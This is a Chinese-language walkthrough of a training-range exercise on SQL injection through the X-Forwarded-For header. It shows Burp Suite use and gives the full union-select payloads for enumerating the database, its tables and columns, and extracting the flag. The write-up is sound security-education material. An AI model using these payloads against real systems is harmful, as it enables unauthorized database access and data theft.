墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for)

首先题目提示
1.png

XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。
启动靶场
点击进入墨者的任性网页

2.png

Burpsuite抓包,放进Repeater

先GO一下

3.png

在请求头中添加X-Forwarded-For
试了试 '、and 1=1 、 and 1=2
当改为or 1=1时,提示语法错误

4.png

5.png
继续,union注入步骤

order by 5显示未知字段,order by 4返回正常

得到数据库中的字段数
6.png

7.png

union select 1,2,3,4

看回显点,多了一行商品,名称,价格,数量分别为2,3,4

8.png

9.png

爆数据库版本和数据库名

union select 1,2,version(),database()

10.png

11.png

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 0,1),database()

第一个表名为comment

union select 1,2,(select table_name from information_schema.tables where table_schema = 'pentesterlab' limit 1,1),database()

12.png

13.png

第二个表名为flag,应该是这个表了。

继续

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),database()

第一个字段名为id,再试试第二个

union select 1,2,(select column_name from information_schema.columns where table_name = 'flag' limit 1,1),database()

14.png

flag应该就在这个字段中

union select 1,2,(select flag from pentesterlab.flag limit 0,1),database()

得到flag

15.png

验证flag,得到key。

16.png

17.png